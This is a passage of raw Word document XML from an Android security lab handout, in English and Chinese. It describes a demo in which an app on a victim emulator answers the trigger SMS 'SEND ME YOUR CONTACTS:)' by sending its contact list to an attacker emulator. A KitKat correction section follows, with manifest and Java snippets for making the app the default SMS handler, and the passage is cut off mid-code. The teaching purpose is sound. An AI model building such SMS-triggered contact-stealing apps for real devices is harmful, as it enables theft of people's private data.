        <w:t>Need to climb the wall</w:t>
      </w:r>
      <w:r w:rsidR="003B63C6">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC2926" w:rsidRDefault="008B0E41" w:rsidP="00CC2926">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Demo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00086947" w:rsidRDefault="00B229B3" w:rsidP="00B229B3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B229B3">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Open two emulators on your eclipse. Emulator</w:t>
      </w:r>
      <w:r w:rsidR="00032F14">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B229B3">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00C65AF2">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> (with ID 5554)</w:t>
      </w:r>
      <w:r w:rsidRPr="00B229B3">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> serves as a victim which has installed and run the malicious application above. Emulator 2</w:t>
      </w:r>
      <w:r w:rsidR="00C65AF2">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> (with ID 5556)</w:t>
      </w:r>
      <w:r w:rsidRPr="00B229B3">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> serves as a malicious attacker which tries to grab Emulator1's contact list.</w:t>
      </w:r>
      <w:r w:rsidR="00086947">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> A</w:t>
      </w:r>
      <w:r w:rsidRPr="00B229B3">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>dd some contacts on Emulator1</w:t>
      </w:r>
      <w:r w:rsidR="00086947">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00086947" w:rsidRPr="00086947">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>On Emulator2, send a short message to Emulator1 with the content "SEND ME YOUR CONTACTS:)" as we hard coded in the application</w:t>
      </w:r>
      <w:r w:rsidR="00086947">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00086947" w:rsidRPr="00086947">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">, it automatically </w:t>
      </w:r>
      <w:r w:rsidR="00086947">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">Emulator 2 will </w:t>
      </w:r>
      <w:r w:rsidR="00086947" w:rsidRPr="00086947">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">receive a response short message from Emulator 1 </w:t>
      </w:r>
      <w:r w:rsidR="00086947">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>with its contact list.</w:t>
      </w:r>
      <w:r w:rsidR="00A45E4A">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00414BFC">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">See </w:t>
      </w:r>
      <w:r w:rsidR="00414BFC" w:rsidRPr="00414BFC">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>SMSSecurity_Threat-Attack_LabDemo.mp4</w:t>
      </w:r>
      <w:r w:rsidR="00414BFC">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> for the demo process. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00086947" w:rsidRDefault="00086947" w:rsidP="00B229B3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B229B3" w:rsidRDefault="00086947" w:rsidP="00B229B3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Please include step-by-step screenshots in the lab report, with your name in English as one of the contacts on Emulator 1.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C44E6" w:rsidRPr="000C44E6" w:rsidRDefault="000C44E6" w:rsidP="000C44E6">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="FF0000"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C44E6">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="FF0000"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Correction</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E21099" w:rsidRDefault="00E21099" w:rsidP="00E21099">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>从</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>android KitKat</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>版本开始，有一个安全改进，只有</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Default SMS app</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>才能</w:t>
      </w:r>
      <w:r w:rsidR="00F545F3">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>截获</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>短信</w:t>
      </w:r>
      <w:r w:rsidR="00F545F3">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>并使其不出现在</w:t>
      </w:r>
      <w:r w:rsidR="00DD6794">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>手机数据库中</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="00E21099">
          <w:rPr>
            <w:rFonts w:eastAsia="宋体"/>
            <w:color w:val="0000FF"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>http://stackoverflow.com/questions/25988574/delete-sms-from-android-on-4-4-4-affected-rows-0zero-after-deleted</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> “Unless your app is marked as default SMS app in device, you won</w:t>
      </w:r>
      <w:r w:rsidR="00F545F3">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>t be able to play with SMS Provider, please read SMS guidelines for the same for KITKAT”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D65EE2" w:rsidRDefault="009336F3" w:rsidP="00D65EE2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidR="00D65EE2" w:rsidRPr="00145E2D">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:eastAsia="宋体"/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>http://stackoverflow.com/questions/20109450/abort-sms-intent-on-android-kitkat</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00D65EE2">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D65EE2" w:rsidRPr="000C44E6">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> You can't stop a message from showing in Default SMS application in kitkat. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D65EE2" w:rsidRDefault="00D65EE2" w:rsidP="00D65EE2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E21099" w:rsidRPr="00E21099" w:rsidRDefault="00D65EE2" w:rsidP="00E21099">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>因此请大家将</w:t>
      </w:r>
      <w:r w:rsidRPr="00F13438">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>SmsBroadCastReceiver</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>设为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Defa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">ult SMS App. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>这使得本实验中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Attack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>不再有隐蔽性</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00E21099" w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>请参照以下博文：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E21099" w:rsidRPr="00E21099" w:rsidRDefault="00E21099" w:rsidP="00E21099">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>“做好准备，让你的短信应用迎接</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Android 4.4(KitKat)</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D65EE2" w:rsidRDefault="009336F3" w:rsidP="00E21099">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidR="00E21099" w:rsidRPr="00E21099">
          <w:rPr>
            <w:rFonts w:eastAsia="宋体"/>
            <w:color w:val="0000FF"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>http://blog.csdn.net/xyz_lmn/article/details/12836751</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00E21099" w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E21099" w:rsidRPr="00E21099" w:rsidRDefault="00E21099" w:rsidP="00E21099">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>该博文为以下英文博文的翻译：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E21099" w:rsidRPr="00E21099" w:rsidRDefault="009336F3" w:rsidP="00E21099">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidR="00E21099" w:rsidRPr="00E21099">
          <w:rPr>
            <w:rFonts w:eastAsia="宋体"/>
            <w:color w:val="0000FF"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>http://android-developers.blogspot.in/2013/10/getting-your-sms-apps-ready-for-kitkat.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00E21099" w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00E21099" w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>需要翻墙</w:t>
      </w:r>
      <w:r w:rsidR="00E21099" w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E21099" w:rsidRPr="00E21099" w:rsidRDefault="00E21099" w:rsidP="00E21099">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>将文中的</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>AndroidManifest</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>节选拷贝到你的</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>AndroidManifest.xml</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>文件中，</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047"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E21099" w:rsidRPr="00E21099" w:rsidTr="00E21099">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5263" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00E21099" w:rsidRPr="00E21099" w:rsidRDefault="00E21099" w:rsidP="00E21099">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E21099">
              <w:rPr>
                <w:rFonts w:eastAsia="宋体"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;manifest&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application&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receiver android:name=".SmsBroadCastReceiver"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android:permission="android.permission.BROADCAST_SMS"&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intent-filter&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action android:name="android.provider.Telephony.SMS_RECEIVED"/&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action android:name="android.provider.Telephony.SMS_DELIVER" /&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intent-filter&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receiver&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 BroadcastReceiver that listens for incoming MMS messages --&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receiver android:name=".MmsReceiver"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android:permission="android.permission.BROADCAST_WAP_PUSH"&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intent-filter&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action android:name="android.provider.Telephony.WAP_PUSH_DELIVER" /&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data android:mimeType="application/vnd.wap.mms-message" /&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intent-filter&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receiver&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 Activity that allows the user to send new SMS/MMS messages --&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activity android:name=".ComposeSmsActivity" &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intent-filter&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action android:name="android.intent.action.SEND" /&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action android:name="android.intent.action.SENDTO" /&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category android:name="android.intent.category.DEFAULT" /&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category android:name="android.intent.category.BROWSABLE" /&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data android:scheme="sms" /&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data android:scheme="smsto" /&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data android:scheme="mms" /&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data android:scheme="mmsto" /&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intent-filter&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activity&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 Service that delivers messages from the phone "quick response" --&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service android:name=".HeadlessSmsSendService"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android:permission="android.permission.SEND_RESPOND_VIA_MESSAGE"  </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E21099" w:rsidRPr="00E21099" w:rsidRDefault="00E21099" w:rsidP="00E21099">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E21099">
              <w:rPr>
                <w:rFonts w:eastAsia="宋体"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">                 android:exported="true" &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intent-filter&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action android:name="android.intent.action.RESPOND_VIA_MESSAGE" /&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category android:name="android.intent.category.DEFAULT" /&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data android:scheme="sms" /&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data android:scheme="smsto" /&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data android:scheme="mms" /&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data android:scheme="mmsto" /&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intent-filter&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service&g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lt;/application&gt;  </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E21099" w:rsidRPr="00E21099" w:rsidRDefault="00E21099" w:rsidP="00E21099">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E21099">
              <w:rPr>
                <w:rFonts w:eastAsia="宋体"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>&lt;/manifest&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E21099" w:rsidRPr="00E21099" w:rsidRDefault="00E21099" w:rsidP="00E21099">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E21099" w:rsidRPr="00E21099" w:rsidRDefault="00E21099" w:rsidP="00E21099">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>用以下</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>代码来设置本</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>App</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Default SMS App:</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047"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E21099" w:rsidRPr="00E21099" w:rsidTr="00E21099">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5263" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00E21099" w:rsidRPr="00E21099" w:rsidRDefault="00E21099" w:rsidP="00E21099">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E21099">
              <w:rPr>
                <w:rFonts w:eastAsia="宋体"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>public void onCreate(Bundle savedInstanceState)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super.onCreate(savedInstanceState);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E21099" w:rsidRPr="00E21099" w:rsidRDefault="00E21099" w:rsidP="00E21099">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E21099">
              <w:rPr>
                <w:rFonts w:eastAsia="宋体"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">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final String myPackageName = getPackageName();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if (!Telephony.Sms.getDefaultSmsPackage(this).equals(myPackageName)) {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Intent intent =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new Intent(Telephony.Sms.Intents.ACTION_CHANGE_DEFAUL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intent.putExtra(Telephony.Sms.Intents.EXTRA_PACKAGE_NAME,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myPackageName);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startActivity(intent);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if (!Telephony.Sms.getDefaultSmsPackage(this).equals(myPackageName)) {  </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E21099" w:rsidRPr="00E21099" w:rsidRDefault="00E21099" w:rsidP="00E21099">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
